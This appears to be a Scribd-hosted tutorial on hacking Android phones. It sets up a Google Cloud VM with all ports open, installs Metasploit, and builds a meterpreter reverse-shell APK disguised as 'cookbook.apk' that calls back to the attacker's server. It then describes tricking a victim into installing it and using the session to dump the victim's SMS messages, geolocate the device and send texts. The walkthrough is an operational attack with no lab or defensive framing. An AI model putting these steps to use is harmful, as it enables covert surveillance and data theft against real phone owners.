0% found this document useful (0 votes)
25 views16 pages

Hacking Android Along With GCP Creation

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
25 views16 pages

Hacking Android Along With GCP Creation

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 16

Hacking Android along with GCP creation.

 First, we need to create a Google Cloud Account.


 Open link: “console.cloud.google.com”
 Then you will get a welcome window appearing.
 Then click on “I Agree” and click on “Accept and Continue”. As shown in the screenshot.

 Now click on “Start Free” present in the top right corner of the window as shown in the
screenshot.

 Now you will see the “Signup” window appears. Then select your “Country” and your
“organization” and then click on “I agree”. And click on “Continue” to proceed.

 Then you will receive a verification code in your EMAIL. Then paste the verification code
and click on “Verify” to proceed.
 Now enter the payment details.

 Now select any options as shown in the screenshot.

 Now open new tab and type and search “console.cloud.google.com”.Then the Google
cloud window appears and then click on “Activate Full Account”.
 And now click on Activate as shown in the screenshot.

 Now select “My First Project”

 Then click on “New Project” as shown in the screenshot.


 Now enter the “Project Name” and click on “Create”.

 Now click on “Compute Engine” and then select “VM instances”.

 Now select “Compute Engine API”


 Then click on “Create Instance”

 Now enter name as “hackbox”. Select region as “us central1 (lowa)” .

 Now select “Machine Configuration” as “E2”


 Now scroll down to select the machine type.Here we are selecting [e2-medium]

 Now scroll down when Boot Disk appears , click on “CHANGE”

 Then select the operating system as “CentOS” and then click on “SELECT” as shown in the
screenshot.
 Scroll down untill when “Firewall” appears , then select both the checkboxes under it as
shown in the screenshot.Then click on “Create”.

 Then you will see your newly cretated VM instance under “VM Instances” as shown in the
screenshot.

 Now click on the three dots present in the one the right side as shown in the screenshot.

 Now the network interface details window appears.


 Now scroll down to find “Firewall rule details” and click on “Edit” as shown in the
screenshot.

 Now select second source filter as “None” , select Protocols and ports as “Allow all”.Now
save it.
 Now click on the three bar symbol present in the left side of the window as shown in the
screenshot.

 Now you will be able to see all protocols are allowed as shown in the screenshot.

 Now we need to start SSH. To start SSH click on ”SSH” as shown in the screenshot.

 Now you will see the SSH opening.


 Now a pop-up appears click on “Authorize”

 After SSH is opened you will see the following terminal appearing.

 Now use command: “sudo su –“. To use root privilege.

 Then to install “MSFCONSOLE” use command: “curl


https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/
config/templates/metasploit-framework-wrappers/msfupdate.erb >
msfinstall”
 Then you will see the following gets downloaded as shown in the screenshot.

 Then use command: “ls” to check whether the file got downloaded or not.

 Now we need to add executable permission to the “msfinstall” by using command:


“chmod +x ./msfinstall”
 Then use command: “ls -l” to check.

 Now to run installer type command: “./msfinstall” and hit enter. Then you will see the
installation gets started.

 After installation it will show the following as shown in the screenshot.

 Now we need to install “HTTPD” by using command: “yum install httpd” and hit enter.Then
the installation starts.

 Now to start “httpd” service use command: “systemctl start httpd”

 Now to check the status of the httpd service use command: “systemctl status -l httpd”
 Now we need to stop the “firewalld” service using command: “systemctl stop firewalld”

 To reccheck whether the “firewalld” service is not running use command: “firewall-cmd --
list-all”

 Now we should make a directory to save the payload. Here we name the directory as
“recipe”

 Now we need to create the payload using msfvenom by using command: “msfvenom -p
android/meterpreter/reverse_tcp LHOST=<Public-IP of Virtual machine>
LPORT=4444 R> /var/www/html/recipe/cookbook.apk”
 Here the Public IP of the virtual machine is:”35.184.49.161”.As shown in the screenshot.

 The command will be: “msfvenom -p android/meterpreter/reverse_tcp


LHOST=35.184.49.161 LPORT=4444 R> /var/www/html/recipe/cookbook.apk”

 Now we need to open msfconsole using command: “msfconsole”

 Now use command: “use multi/handler”

 Now use command: “set PAYLOAD android/meterpreter/reverse_tcp”

 Now use command: “show options”


 Then use command: “set LHOST 0.0.0.0”

 Then use command: “exploit” to start the reverse tcp handler.

 Now when the victim opens the link: “https://[public_ip_of_virtual_machine/recipe/”

 Then when the victim downloads the “cookbook.apk”


 Click on “Download anyway” to download.
 Then when the victim installs the file by clicking in install.

 Then installation starts.


 It gets installed as MainActivity.
Note:If any warning comes click on “Install Anyway”
 Then when the victim clicks on “open” after installation.

 Then the meterpreter session becomes active as shown in the screenshot.

 Now use command: “sysinfo” to get the system information of the device.
 Now use command: “dump_sms” to save all the messages of the victim into the attacker
machine.

 Now use command: “geolocate” to find the geolocation of the device.

 Now you can use command: send_sms -d [phone number to send message] -t
“(message)”.

You might also like